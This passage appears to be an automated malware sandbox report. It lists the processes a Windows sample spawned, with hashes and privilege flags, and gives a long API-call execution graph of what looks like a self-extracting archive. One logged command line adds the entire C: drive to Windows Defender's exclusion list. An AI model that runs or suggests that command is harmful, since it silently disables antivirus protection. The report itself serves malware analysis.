                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:26
                                                            Start time:08:12:09
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:27
                                                            Start time:08:12:10
                                                            Start date:09/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Add-MpPreference -ExclusionPath C:"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:10%
                                                              Total number of Nodes:1575
                                                              Total number of Limit Nodes:43
                                                              execution_graph 25574 cb62ca 124 API calls __InternalCxxFrameHandler 23560 cbdec2 23561 cbdecf 23560->23561 23568 cae617 23561->23568 23569 cae627 23568->23569 23580 cae648 23569->23580 23572 ca4092 23603 ca4065 23572->23603 23575 cbb568 PeekMessageW 23576 cbb5bc 23575->23576 23577 cbb583 GetMessageW 23575->23577 23578 cbb599 IsDialogMessageW 23577->23578 23579 cbb5a8 TranslateMessage DispatchMessageW 23577->23579 23578->23576 23578->23579 23579->23576 23586 cad9b0 23580->23586 23583 cae66b LoadStringW 23584 cae645 23583->23584 23585 cae682 LoadStringW 23583->23585 23584->23572 23585->23584 23591 cad8ec 23586->23591 23588 cad9cd 23589 cad9e2 23588->23589 23599 cad9f0 26 API calls 23588->23599 23589->23583 23589->23584 23592 cad904 23591->23592 23598 cad984 _strncpy 23591->23598 23594 cad928 23592->23594 23600 cb1da7 WideCharToMultiByte 23592->23600 23597 cad959 23594->23597 23601 cae5b1 50 API calls __vsnprintf 23594->23601 23602 cc6159 26 API calls 3 library calls 23597->23602 23598->23588 23599->23589 23600->23594 23601->23597 23602->23598 23604 ca407c __vsnwprintf_l 23603->23604 23607 cc5fd4 23604->23607 23610 cc4097 23607->23610 23611 cc40bf 23610->23611 23612 cc40d7 23610->23612 23634 cc91a8 20 API calls __dosmaperr 23611->23634 23612->23611 23613 cc40df 23612->23613 23636 cc4636 23613->23636 23616 cc40c4 23635 cc9087 26 API calls ___std_exception_copy 23616->23635 23621 cc4167 23645 cc49e6 51 API calls 3 library calls 23621->23645 23622 ca4086 SetDlgItemTextW 23622->23575 23625 cc40cf 23627 cbfbbc 23625->23627 23626 cc4172 23646 cc46b9 20 API calls _free 23626->23646 23628 cbfbc5 IsProcessorFeaturePresent 23627->23628 23629 cbfbc4 23627->23629 23631 cbfc07 23628->23631 23629->23622 23647 cbfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23631->23647 23633 cbfcea 23633->23622 23634->23616 23635->23625 23637 cc4653 23636->23637 23638 cc40ef 23636->23638 23637->23638 23648 cc97e5 GetLastError 23637->23648 23644 cc4601 20 API calls 2 library calls 23638->23644 23640 cc4674 23668 cc993a 38 API calls __cftof 23640->23668 23642 cc468d 23669 cc9967 38 API calls __cftof 23642->23669 23644->23621 23645->23626 23646->23625 23647->23633 23649 cc97fb 23648->23649 23653 cc9801 23648->23653 23670 ccae5b 11 API calls 2 library calls 23649->23670 23654 cc9850 SetLastError 23653->23654 23671 ccb136 23653->23671 23654->23640 23655 cc981b 23678 cc8dcc 23655->23678 23658 cc9830 23658->23655 23660 cc9837 23658->23660 23659 cc9821 23661 cc985c SetLastError 23659->23661 23685 cc9649 20 API calls __dosmaperr 23660->23685 23686 cc8d24 38 API calls _abort 23661->23686 23664 cc9842 23666 cc8dcc _free 20 API calls 23664->23666 23667 cc9849 23666->23667 23667->23654 23667->23661 23668->23642 23669->23638 23670->23653 23676 ccb143 __dosmaperr 23671->23676 23672 ccb183 23688 cc91a8 20 API calls __dosmaperr 23672->23688 23673 ccb16e RtlAllocateHeap 23674 cc9813 23673->23674 23673->23676 23674->23655 23684 ccaeb1 11 API calls 2 library calls 23674->23684 23676->23672 23676->23673 23687 cc7a5e 7 API calls 2 library calls 23676->23687 23679 cc8e00 __dosmaperr 23678->23679 23680 cc8dd7 RtlFreeHeap 23678->23680 23679->23659 23680->23679 23681 cc8dec 23680->23681 23689 cc91a8 20 API calls __dosmaperr 23681->23689 23683 cc8df2 GetLastError 23683->23679 23684->23658 23685->23664 23687->23676 23688->23674 23689->23683 25549 cbb5c0 100 API calls 25589 cb77c0 119 API calls 25590 cbffc0 RaiseException _com_raise_error _com_error::_com_error 25576 cc0ada 51 API calls 2 library calls 25516 cbf4d3 20 API calls 23808 cbe1d1 14 API calls ___delayLoadHelper2@8 23810 cbe2d7 23811 cbe1db 23810->23811 23812 cbe85d ___delayLoadHelper2@8 14 API calls 23811->23812 23812->23811 25591 cca3d0 21 API calls 2 library calls 25592 cd2bd0 VariantClear 23815 ca10d5 23820 ca5abd 23815->23820 23821 ca5ac7 __EH_prolog 23820->23821 23827 cab505 23821->23827 23823 ca5ad3 23833 ca5cac GetCurrentProcess GetProcessAffinityMask 23823->23833 23828 cab50f __EH_prolog 23827->23828 23834 caf1d0 82 API calls 23828->23834 23830 cab521 23835 cab61e 23830->23835 23834->23830 23836 cab630 __cftof 23835->23836 23839 cb10dc 23836->23839 23842 cb109e GetCurrentProcess GetProcessAffinityMask 23839->23842 23843 cab597 23842->23843 23843->23823 25551 caf1e8 FreeLibrary 23850 cbb7e0 23851 cbb7ea __EH_prolog 23850->23851 24020 ca1316 23851->24020 23854 cbb841 23855 cbb82a 23855->23854 23858 cbb89b 23855->23858 23859 cbb838 23855->23859 23856 cbbf0f 24093 cbd69e 23856->24093 23861 cbb92e GetDlgItemTextW 23858->23861 23869 cbb8b1 23858->23869 23862 cbb878 23859->23862 23863 cbb83c 23859->23863 23861->23862 23868 cbb96b 23861->23868 23862->23854 23872 cbb95f EndDialog 23862->23872 23863->23854 23870 cae617 53 API calls 23863->23870 23864 cbbf2a SendMessageW 23865 cbbf38 23864->23865 23866 cbbf52 GetDlgItem SendMessageW 23865->23866 23867 cbbf41 SendDlgItemMessageW 23865->23867 24111 cba64d GetCurrentDirectoryW 23866->24111 23867->23866 23873 cbb980 GetDlgItem 23868->23873 24018 cbb974 23868->24018 23874 cae617 53 API calls 23869->23874 23875 cbb85b 23870->23875 23872->23854 23877 cbb9b7 SetFocus 23873->23877 23878 cbb994 SendMessageW SendMessageW 23873->23878 23879 cbb8ce SetDlgItemTextW 23874->23879 24131 ca124f SHGetMalloc 23875->24131 23876 cbbf82 GetDlgItem 23881 cbbf9f 23876->23881 23882 cbbfa5 SetWindowTextW 23876->23882 23883 cbb9c7 23877->23883 23897 cbb9e0 23877->23897 23878->23877 23884 cbb8d9 23879->23884 23881->23882 24112 cbabab GetClassNameW 23882->24112 23885 cae617 53 API calls 23883->23885 23884->23854 23889 cbb8e6 GetMessageW 23884->23889 23890 cbb9d1 23885->23890 23886 cbb862 23886->23854 23895 cbc1fc SetDlgItemTextW 23886->23895 23887 cbbe55 23891 cae617 53 API calls 23887->23891 23889->23854 23893 cbb8fd IsDialogMessageW 23889->23893 24132 cbd4d4 23890->24132 23896 cbbe65 SetDlgItemTextW 23891->23896 23893->23884 23899 cbb90c TranslateMessage DispatchMessageW 23893->23899 23895->23854 23900 cbbe79 23896->23900 23902 cae617 53 API calls 23897->23902 23899->23884 23904 cae617 53 API calls 23900->23904 23903 cbba17 23902->23903 23909 ca4092 _swprintf 51 API calls 23903->23909 23932 cbbe9c _wcslen 23904->23932 23905 cbbff0 23906 cbc020 23905->23906 23911 cae617 53 API calls 23905->23911 23916 cbc73f 98 API calls 23906->23916 23949 cbc0d8 23906->23949 23907 cbb9d9 24030 caa0b1 23907->24030 23913 cbba29 23909->23913 23910 cbc73f 98 API calls 23910->23905 23914 cbc003 SetDlgItemTextW 23911->23914 23918 cbd4d4 16 API calls 23913->23918 23919 cae617 53 API calls 23914->23919 23915 cbba68 GetLastError 23920 cbba73 23915->23920 23922 cbc03b 23916->23922 23917 cbc18b 23923 cbc19d 23917->23923 23924 cbc194 EnableWindow 23917->23924 23918->23907 23927 cbc017 SetDlgItemTextW 23919->23927 24036 cbac04 SetCurrentDirectoryW 23920->24036 23936 cbc04d 23922->23936 23962 cbc072 23922->23962 23926 cbc1ba 23923->23926 24150 ca12d3 GetDlgItem KiUserCallbackDispatcher 23923->24150 23924->23923 23925 cbbeed 23928 cae617 53 API calls 23925->23928 23933 cbc1e1 23926->23933 23946 cbc1d9 SendMessageW 23926->23946 23927->23906 23928->23854 23929 cbba87 23934 cbba9e 23929->23934 23935 cbba90 GetLastError 23929->23935 23930 cbc0cb 23938 cbc73f 98 API calls 23930->23938 23932->23925 23941 cae617 53 API calls 23932->23941 23933->23854 23947 cae617 53 API calls 23933->23947 23940 cbbb11 23934->23940 23942 cbbb20 23934->23942 23948 cbbaae GetTickCount 23934->23948 23935->23934 24148 cb9ed5 32 API calls 23936->24148 23937 cbc1b0 24151 ca12d3 GetDlgItem KiUserCallbackDispatcher 23937->24151 23938->23949 23940->23942 23943 cbbd56 23940->23943 23950 cbbed0 23941->23950 23952 cbbcfb 23942->23952 23953 cbbb39 GetModuleFileNameW 23942->23953 23954 cbbcf1 23942->23954 24052 ca12f1 GetDlgItem ShowWindow 23943->24052 23944 cbc066 23944->23962 23946->23933 23947->23886 23956 ca4092 _swprintf 51 API calls 23948->23956 23949->23917 23951 cbc169 23949->23951 23964 cae617 53 API calls 23949->23964 23958 ca4092 _swprintf 51 API calls 23950->23958 24149 cb9ed5 32 API calls 23951->24149 23961 cae617 53 API calls 23952->23961 24142 caf28c 82 API calls 23953->24142 23954->23862 23954->23952 23957 cbbac7 23956->23957 24037 ca966e 23957->24037 23958->23925 23967 cbbd05 23961->23967 23962->23930 23968 cbc73f 98 API calls 23962->23968 23963 cbbd66 24053 ca12f1 GetDlgItem ShowWindow 23963->24053 23964->23949 23965 cbc188 23965->23917 23966 cbbb5f 23970 ca4092 _swprintf 51 API calls 23966->23970 23971 ca4092 _swprintf 51 API calls 23967->23971 23972 cbc0a0 23968->23972 23975 cbbb81 CreateFileMappingW 23970->23975 23976 cbbd23 23971->23976 23972->23930 23977 cbc0a9 DialogBoxParamW 23972->23977 23973 cbbd70 23978 cae617 53 API calls 23973->23978 23980 cbbbe3 GetCommandLineW 23975->23980 24014 cbbc60 __InternalCxxFrameHandler 23975->24014 23989 cae617 53 API calls 23976->23989 23977->23862 23977->23930 23981 cbbd7a SetDlgItemTextW 23978->23981 23979 cbbaed 23984 cbbaff 23979->23984 23985 cbbaf4 GetLastError 23979->23985 23986 cbbbf4 23980->23986 24054 ca12f1 GetDlgItem ShowWindow 23981->24054 23983 cbbc6b ShellExecuteExW 23998 cbbc88 23983->23998 24045 ca959a 23984->24045 23985->23984 24143 cbb425 SHGetMalloc 23986->24143 23987 cbbd8c SetDlgItemTextW GetDlgItem 23991 cbbda9 GetWindowLongW SetWindowLongW 23987->23991 23992 cbbdc1 23987->23992 23993 cbbd3d 23989->23993 23991->23992 24055 cbc73f 23992->24055 23994 cbbc10 24144 cbb425 SHGetMalloc 23994->24144 24001 cbbc9d WaitForInputIdle 23998->24001 24002 cbbccb 23998->24002 23999 cbbc1c 24145 cbb425 SHGetMalloc 23999->24145 24000 cbc73f 98 API calls 24004 cbbddd 24000->24004 24005 cbbcb2 24001->24005 24002->23954 24009 cbbce1 UnmapViewOfFile CloseHandle 24002->24009 24081 cbda52 24004->24081 24005->24002 24008 cbbcb7 Sleep 24005->24008 24006 cbbc28 24146 caf3fa 82 API calls 2 library calls 24006->24146 24008->24002 24008->24005 24009->23954 24012 cbbc3f MapViewOfFile 24012->24014 24013 cbc73f 98 API calls 24017 cbbe03 24013->24017 24014->23983 24015 cbbe2c 24147 ca12d3 GetDlgItem KiUserCallbackDispatcher 24015->24147 24017->24015 24019 cbc73f 98 API calls 24017->24019 24018->23862 24018->23887 24019->24015 24021 ca1378 24020->24021 24022 ca131f 24020->24022 24153 cae2c1 GetWindowLongW SetWindowLongW 24021->24153 24024 ca1385 24022->24024 24152 cae2e8 62 API calls 2 library calls 24022->24152 24024->23854 24024->23855 24024->23856 24026 ca1341 24026->24024 24027 ca1354 GetDlgItem 24026->24027 24027->24024 24028 ca1364 24027->24028 24028->24024 24029 ca136a SetWindowTextW 24028->24029 24029->24024 24033 caa0bb 24030->24033 24031 caa14c 24032 caa2b2 8 API calls 24031->24032 24034 caa175 24031->24034 24032->24034 24033->24031 24033->24034 24154 caa2b2 24033->24154 24034->23915 24034->23920 24036->23929 24038 ca9678 24037->24038 24039 ca96d5 CreateFileW 24038->24039 24040 ca96c9 24038->24040 24039->24040 24041 ca971f 24040->24041 24042 cabb03 GetCurrentDirectoryW 24040->24042 24041->23979 24043 ca9704 24042->24043 24043->24041 24044 ca9708 CreateFileW 24043->24044 24044->24041 24046 ca95be 24045->24046 24047 ca95cf 24045->24047 24046->24047 24048 ca95ca 24046->24048 24049 ca95d1 24046->24049 24047->23940 24175 ca974e 24048->24175 24180 ca9620 24049->24180 24052->23963 24053->23973 24054->23987 24056 cbc749 __EH_prolog 24055->24056 24057 cbbdcf 24056->24057 24058 cbb314 ExpandEnvironmentStringsW 24056->24058 24057->24000 24066 cbc780 _wcslen _wcsrchr 24058->24066 24060 cbb314 ExpandEnvironmentStringsW 24060->24066 24061 cbca67 SetWindowTextW 24061->24066 24064 cc3e3e 22 API calls 24064->24066 24066->24057 24066->24060 24066->24061 24066->24064 24067 cbc855 SetFileAttributesW 24066->24067 24072 cbcc31 GetDlgItem SetWindowTextW SendMessageW 24066->24072 24075 cbcc71 SendMessageW 24066->24075 24195 cb1fbb CompareStringW 24066->24195 24196 cba64d GetCurrentDirectoryW 24066->24196 24198 caa5d1 6 API calls 24066->24198 24199 caa55a FindClose 24066->24199 24200 cbb48e 76 API calls 2 library calls 24066->24200 24069 cbc90f GetFileAttributesW 24067->24069 24079 cbc86f __cftof _wcslen 24067->24079 24069->24066 24071 cbc921 DeleteFileW 24069->24071 24071->24066 24073 cbc932 24071->24073 24072->24066 24074 ca4092 _swprintf 51 API calls 24073->24074 24076 cbc952 GetFileAttributesW 24074->24076 24075->24066 24076->24073 24077 cbc967 MoveFileW 24076->24077 24077->24066 24078 cbc97f MoveFileExW 24077->24078 24078->24066 24079->24066 24080 cbc8eb SHFileOperationW 24079->24080 24197 cab991 51 API calls 2 library calls 24079->24197 24080->24069 24082 cbda5c __EH_prolog 24081->24082 24201 cb0659 24082->24201 24084 cbda8d 24205 ca5b3d 24084->24205 24086 cbdaab 24209 ca7b0d 24086->24209 24090 cbdafe 24225 ca7b9e 24090->24225 24092 cbbdee 24092->24013 24094 cbd6a8 24093->24094 24730 cba5c6 24094->24730 24097 cbd6b5 GetWindow 24098 cbbf15 24097->24098 24101 cbd6d5 24097->24101 24098->23864 24098->23865 24099 cbd6e2 GetClassNameW 24735 cb1fbb CompareStringW 24099->24735 24101->24098 24101->24099 24102 cbd76a GetWindow 24101->24102 24103 cbd706 GetWindowLongW 24101->24103 24102->24098 24102->24101 24103->24102 24104 cbd716 SendMessageW 24103->24104 24104->24102 24105 cbd72c GetObjectW 24104->24105 24736 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24105->24736 24107 cbd743 24737 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24107->24737 24738 cba80c 8 API calls 24107->24738 24110 cbd754 SendMessageW DeleteObject 24110->24102 24111->23876 24113 cbabcc 24112->24113 24117 cbabf1 24112->24117 24741 cb1fbb CompareStringW 24113->24741 24115 cbabdf 24116 cbabe3 FindWindowExW 24115->24116 24115->24117 24116->24117 24118 cbb093 24117->24118 24119 cbb09d __EH_prolog 24118->24119 24120 ca13dc 84 API calls 24119->24120 24121 cbb0bf 24120->24121 24742 ca1fdc 24121->24742 24124 cbb0eb 24126 ca19af 129 API calls 24124->24126 24125 cbb0d9 24127 ca1692 86 API calls 24125->24127 24130 cbb10d __InternalCxxFrameHandler ___std_exception_copy 24126->24130 24128 cbb0e4 24127->24128 24128->23905 24128->23910 24129 ca1692 86 API calls 24129->24128 24130->24129 24131->23886 24133 cbb568 5 API calls 24132->24133 24134 cbd4e0 GetDlgItem 24133->24134 24135 cbd502 24134->24135 24136 cbd536 SendMessageW SendMessageW 24134->24136 24139 cbd50d ShowWindow SendMessageW SendMessageW 24135->24139 24137 cbd572 24136->24137 24138 cbd591 SendMessageW SendMessageW SendMessageW 24136->24138 24137->24138 24140 cbd5e7 SendMessageW 24138->24140 24141 cbd5c4 SendMessageW 24138->24141 24139->24136 24140->23907 24141->24140 24142->23966 24143->23994 24144->23999 24145->24006 24146->24012 24147->24018 24148->23944 24149->23965 24150->23937 24151->23926 24152->24026 24153->24024 24155 caa2bf 24154->24155 24156 caa2e3 24155->24156 24158 caa2d6 CreateDirectoryW 24155->24158 24157 caa231 3 API calls 24156->24157 24160 caa2e9 24157->24160 24158->24156 24159 caa316 24158->24159 24162 caa325 24159->24162 24167 caa4ed 24159->24167 24161 caa329 GetLastError 24160->24161 24163 cabb03 GetCurrentDirectoryW 24160->24163 24161->24162 24162->24033 24165 caa2ff 24163->24165 24165->24161 24166 caa303 CreateDirectoryW 24165->24166 24166->24159 24166->24161 24168 cbec50 24167->24168 24169 caa4fa SetFileAttributesW 24168->24169 24170 caa53d 24169->24170 24171 caa510 24169->24171 24170->24162 24172 cabb03 GetCurrentDirectoryW 24171->24172 24173 caa524 24172->24173 24173->24170 24174 caa528 SetFileAttributesW 24173->24174 24174->24170 24176 ca9781 24175->24176 24177 ca9757 24175->24177 24176->24047 24177->24176 24186 caa1e0 24177->24186 24181 ca964a 24180->24181 24182 ca962c 24180->24182 24183 ca9669 24181->24183 24194 ca6bd5 76 API calls 24181->24194 24182->24181 24184 ca9638 CloseHandle 24182->24184 24183->24047 24184->24181 24187 cbec50 24186->24187 24188 caa1ed DeleteFileW 24187->24188 24189 ca977f 24188->24189 24190 caa200 24188->24190 24189->24047 24191 cabb03 GetCurrentDirectoryW 24190->24191 24192 caa214 24191->24192 24192->24189 24193 caa218 DeleteFileW 24192->24193 24193->24189 24194->24183 24195->24066 24196->24066 24197->24079 24198->24066 24199->24066 24200->24066 24202 cb0666 _wcslen 24201->24202 24229 ca17e9 24202->24229 24204 cb067e 24204->24084 24206 cb0659 _wcslen 24205->24206 24207 ca17e9 78 API calls 24206->24207 24208 cb067e 24207->24208 24208->24086 24210 ca7b17 __EH_prolog 24209->24210 24246 cace40 24210->24246 24212 ca7b32 24252 cbeb38 24212->24252 24214 ca7b5c 24261 cb4a76 24214->24261 24217 ca7c7d 24218 ca7c87 24217->24218 24220 ca7cf1 24218->24220 24293 caa56d 24218->24293 24222 ca7d50 24220->24222 24271 ca8284 24220->24271 24221 ca7d92 24221->24090 24222->24221 24299 ca138b 74 API calls 24222->24299 24226 ca7bac 24225->24226 24228 ca7bb3 24225->24228 24227 cb2297 86 API calls 24226->24227 24227->24228 24230 ca17ff 24229->24230 24241 ca185a __InternalCxxFrameHandler 24229->24241 24231 ca1828 24230->24231 24242 ca6c36 76 API calls __vswprintf_c_l 24230->24242 24232 ca1887 24231->24232 24238 ca1847 ___std_exception_copy 24231->24238 24235 cc3e3e 22 API calls 24232->24235 24234 ca181e 24243 ca6ca7 75 API calls 24234->24243 24237 ca188e 24235->24237 24237->24241 24245 ca6ca7 75 API calls 24237->24245 24238->24241 24244 ca6ca7 75 API calls 24238->24244 24241->24204 24242->24234 24243->24231 24244->24241 24245->24241 24247 cace4a __EH_prolog 24246->24247 24248 cbeb38 8 API calls 24247->24248 24249 cace8d 24248->24249 24250 cbeb38 8 API calls 24249->24250 24251 caceb1 24250->24251 24251->24212 24253 cbeb3d ___std_exception_copy 24252->24253 24254 cbeb57 24253->24254 24257 cbeb59 24253->24257 24267 cc7a5e 7 API calls 2 library calls 24253->24267 24254->24214 24256 cbf5c9 24269 cc238d RaiseException 24256->24269 24257->24256 24268 cc238d RaiseException 24257->24268 24260 cbf5e6 24262 cb4a80 __EH_prolog 24261->24262 24263 cbeb38 8 API calls 24262->24263 24264 cb4a9c 24263->24264 24265 ca7b8b 24264->24265 24270 cb0e46 80 API calls 24264->24270 24265->24217 24267->24253 24268->24256 24269->24260 24270->24265 24272 ca828e __EH_prolog 24271->24272 24300 ca13dc 24272->24300 24274 ca82aa 24275 ca82bb 24274->24275 24443 ca9f42 24274->24443 24278 ca82f2 24275->24278 24308 ca1a04 24275->24308 24439 ca1692 24278->24439 24281 ca8389 24327 ca8430 24281->24327 24284 ca83e8 24335 ca1f6d 24284->24335 24288 ca82ee 24288->24278 24288->24281 24291 caa56d 7 API calls 24288->24291 24447 cac0c5 CompareStringW _wcslen 24288->24447 24289 ca83f3 24289->24278 24339 ca3b2d 24289->24339 24351 ca848e 24289->24351 24291->24288 24294 caa582 24293->24294 24295 caa5b0 24294->24295 24719 caa69b 24294->24719 24295->24218 24297 caa592 24297->24295 24298 caa597 FindClose 24297->24298 24298->24295 24299->24221 24301 ca13e1 __EH_prolog 24300->24301 24302 cace40 8 API calls 24301->24302 24303 ca1419 24302->24303 24304 cbeb38 8 API calls 24303->24304 24307 ca1474 __cftof 24303->24307 24305 ca1461 24304->24305 24306 cab505 84 API calls 24305->24306 24305->24307 24306->24307 24307->24274 24309 ca1a0e __EH_prolog 24308->24309 24321 ca1a61 24309->24321 24324 ca1b9b 24309->24324 24448 ca13ba 24309->24448 24312 ca1bc7 24460 ca138b 74 API calls 24312->24460 24314 ca3b2d 102 API calls 24317 ca1c12 24314->24317 24315 ca1bd4 24315->24314 24315->24324 24316 ca1c5a 24320 ca1c8d 24316->24320 24316->24324 24461 ca138b 74 API calls 24316->24461 24317->24316 24319 ca3b2d 102 API calls 24317->24319 24319->24317 24320->24324 24325 ca9e80 79 API calls 24320->24325 24321->24312 24321->24315 24321->24324 24322 ca3b2d 102 API calls 24323 ca1cde 24322->24323 24323->24322 24323->24324 24324->24288 24325->24323 24481 cacf3d 24327->24481 24329 ca8440 24485 cb13d2 GetSystemTime SystemTimeToFileTime 24329->24485 24331 ca83a3 24331->24284 24332 cb1b66 24331->24332 24490 cbde6b 24332->24490 24336 ca1f72 __EH_prolog 24335->24336 24338 ca1fa6 24336->24338 24498 ca19af 24336->24498 24338->24289 24340 ca3b39 24339->24340 24341 ca3b3d 24339->24341 24340->24289 24350 ca9e80 79 API calls 24341->24350 24342 ca3b4f 24343 ca3b6a 24342->24343 24344 ca3b78 24342->24344 24349 ca3baa 24343->24349 24653 ca32f7 90 API calls 2 library calls 24343->24653 24654 ca286b 102 API calls 3 library calls 24344->24654 24347 ca3b76 24347->24349 24655 ca20d7 74 API calls 24347->24655 24349->24289 24350->24342 24352 ca8498 __EH_prolog 24351->24352 24355 ca84d5 24352->24355 24362 ca8513 24352->24362 24679 cb8c8d 104 API calls 24352->24679 24354 ca84f5 24356 ca84fa 24354->24356 24357 ca851c 24354->24357 24355->24354 24360 ca857a 24355->24360 24355->24362 24356->24362 24680 ca7a0d 153 API calls 24356->24680 24357->24362 24681 cb8c8d 104 API calls 24357->24681 24360->24362 24656 ca5d1a 24360->24656 24362->24289 24363 ca8605 24363->24362 24662 ca8167 24363->24662 24366 ca8797 24367 caa56d 7 API calls 24366->24367 24368 ca8802 24366->24368 24367->24368 24668 ca7c0d 24368->24668 24370 cad051 82 API calls 24376 ca885d 24370->24376 24371 ca8a5f 24377 ca8ab6 24371->24377 24389 ca8a6a 24371->24389 24372 ca8992 24372->24371 24379 ca89e1 24372->24379 24373 ca898b 24684 ca2021 74 API calls 24373->24684 24376->24362 24376->24370 24376->24372 24376->24373 24682 ca8117 85 API calls 24376->24682 24683 ca2021 74 API calls 24376->24683 24382 ca8a4c 24377->24382 24687 ca7fc0 97 API calls 24377->24687 24378 ca8ab4 24383 ca959a 80 API calls 24378->24383 24380 ca8b14 24379->24380 24379->24382 24384 caa231 3 API calls 24379->24384 24398 ca8b82 24380->24398 24428 ca9105 24380->24428 24688 ca98bc 24380->24688 24381 ca959a 80 API calls 24381->24362 24382->24378 24382->24380 24383->24362 24386 ca8a19 24384->24386 24386->24382 24685 ca92a3 97 API calls 24386->24685 24387 caab1a 8 API calls 24390 ca8bd1 24387->24390 24389->24378 24686 ca7db2 101 API calls 24389->24686 24393 caab1a 8 API calls 24390->24393 24399 ca8be7 24393->24399 24396 ca8b70 24692 ca6e98 77 API calls 24396->24692 24398->24387 24400 ca8cbc 24399->24400 24411 ca8c93 24399->24411 24419 ca981a 79 API calls 24399->24419 24401 ca8d18 24400->24401 24402 ca8e40 24400->24402 24405 ca8d8a 24401->24405 24406 ca8d28 24401->24406 24403 ca8e52 24402->24403 24404 ca8e66 24402->24404 24424 ca8d49 24402->24424 24407 ca9215 124 API calls 24403->24407 24408 cb3377 75 API calls 24404->24408 24412 ca8167 19 API calls 24405->24412 24409 ca8d6e 24406->24409 24417 ca8d37 24406->24417 24407->24424 24410 ca8e7f 24408->24410 24409->24424 24695 ca77b8 111 API calls 24409->24695 24414 cb3020 124 API calls 24410->24414 24411->24400 24693 ca9a3c 82 API calls 24411->24693 24416 ca8dbd 24412->24416 24414->24424 24420 ca8de6 24416->24420 24421 ca8df5 24416->24421 24416->24424 24694 ca2021 74 API calls 24417->24694 24419->24411 24696 ca7542 85 API calls 24420->24696 24697 ca9155 93 API calls __EH_prolog 24421->24697 24427 ca8f85 24424->24427 24698 ca2021 74 API calls 24424->24698 24426 ca9090 24426->24428 24430 caa4ed 3 API calls 24426->24430 24427->24426 24427->24428 24429 ca903e 24427->24429 24699 ca9f09 SetEndOfFile 24427->24699 24428->24381 24674 ca9da2 24429->24674 24431 ca90eb 24430->24431 24431->24428 24700 ca2021 74 API calls 24431->24700 24434 ca9085 24435 ca9620 77 API calls 24434->24435 24435->24426 24437 ca90fb 24701 ca6dcb 76 API calls 24437->24701 24440 ca16a4 24439->24440 24717 cacee1 86 API calls 24440->24717 24444 ca9f59 24443->24444 24445 ca9f63 24444->24445 24718 ca6d0c 78 API calls 24444->24718 24445->24275 24447->24288 24462 ca1732 24448->24462 24450 ca13d6 24451 ca9e80 24450->24451 24452 ca9e92 24451->24452 24453 ca9ea5 24451->24453 24456 ca9eb0 24452->24456 24479 ca6d5b 77 API calls 24452->24479 24455 ca9eb8 SetFilePointer 24453->24455 24453->24456 24455->24456 24457 ca9ed4 GetLastError 24455->24457 24456->24321 24457->24456 24458 ca9ede 24457->24458 24458->24456 24480 ca6d5b 77 API calls 24458->24480 24460->24324 24461->24320 24463 ca1748 24462->24463 24474 ca17a0 __InternalCxxFrameHandler 24462->24474 24464 ca1771 24463->24464 24475 ca6c36 76 API calls __vswprintf_c_l 24463->24475 24465 ca178d ___std_exception_copy 24464->24465 24466 ca17c7 24464->24466 24465->24474 24477 ca6ca7 75 API calls 24465->24477 24469 cc3e3e 22 API calls 24466->24469 24468 ca1767 24476 ca6ca7 75 API calls 24468->24476 24471 ca17ce 24469->24471 24471->24474 24478 ca6ca7 75 API calls 24471->24478 24474->24450 24475->24468 24476->24464 24477->24474 24478->24474 24479->24453 24480->24456 24482 cacf4d 24481->24482 24484 cacf54 24481->24484 24486 ca981a 24482->24486 24484->24329 24485->24331 24487 ca9833 24486->24487 24489 ca9e80 79 API calls 24487->24489 24488 ca9865 24488->24484 24489->24488 24491 cbde78 24490->24491 24492 cae617 53 API calls 24491->24492 24493 cbde9b 24492->24493 24494 ca4092 _swprintf 51 API calls 24493->24494 24495 cbdead 24494->24495 24496 cbd4d4 16 API calls 24495->24496 24497 cb1b7c 24496->24497 24497->24284 24499 ca19bf 24498->24499 24502 ca19bb 24498->24502 24503 ca9e80 79 API calls 24499->24503 24500 ca19d4 24504 ca18f6 24500->24504 24502->24338 24503->24500 24505 ca1908 24504->24505 24506 ca1945 24504->24506 24507 ca3b2d 102 API calls 24505->24507 24512 ca3fa3 24506->24512 24510 ca1928 24507->24510 24510->24502 24515 ca3fac 24512->24515 24513 ca3b2d 102 API calls 24513->24515 24515->24513 24516 ca1966 24515->24516 24529 cb0e08 24515->24529 24516->24510 24517 ca1e50 24516->24517 24518 ca1e5a __EH_prolog 24517->24518 24537 ca3bba 24518->24537 24520 ca1e84 24521 ca1732 78 API calls 24520->24521 24523 ca1f0b 24520->24523 24522 ca1e9b 24521->24522 24565 ca18a9 78 API calls 24522->24565 24523->24510 24525 ca1eb3 24527 ca1ebf _wcslen 24525->24527 24566 cb1b84 MultiByteToWideChar 24525->24566 24567 ca18a9 78 API calls 24527->24567 24530 cb0e0f 24529->24530 24531 cb0e2a 24530->24531 24535 ca6c31 RaiseException _com_raise_error 24530->24535 24533 cb0e3b SetThreadExecutionState 24531->24533 24536 ca6c31 RaiseException _com_raise_error 24531->24536 24533->24515 24535->24531 24536->24533 24538 ca3bc4 __EH_prolog 24537->24538 24539 ca3bda 24538->24539 24540 ca3bf6 24538->24540 24593 ca138b 74 API calls 24539->24593 24542 ca3e51 24540->24542 24545 ca3c22 24540->24545 24618 ca138b 74 API calls 24542->24618 24544 ca3be5 24544->24520 24545->24544 24568 cb3377 24545->24568 24547 ca3ca3 24548 ca3d2e 24547->24548 24564 ca3c9a 24547->24564 24596 cad051 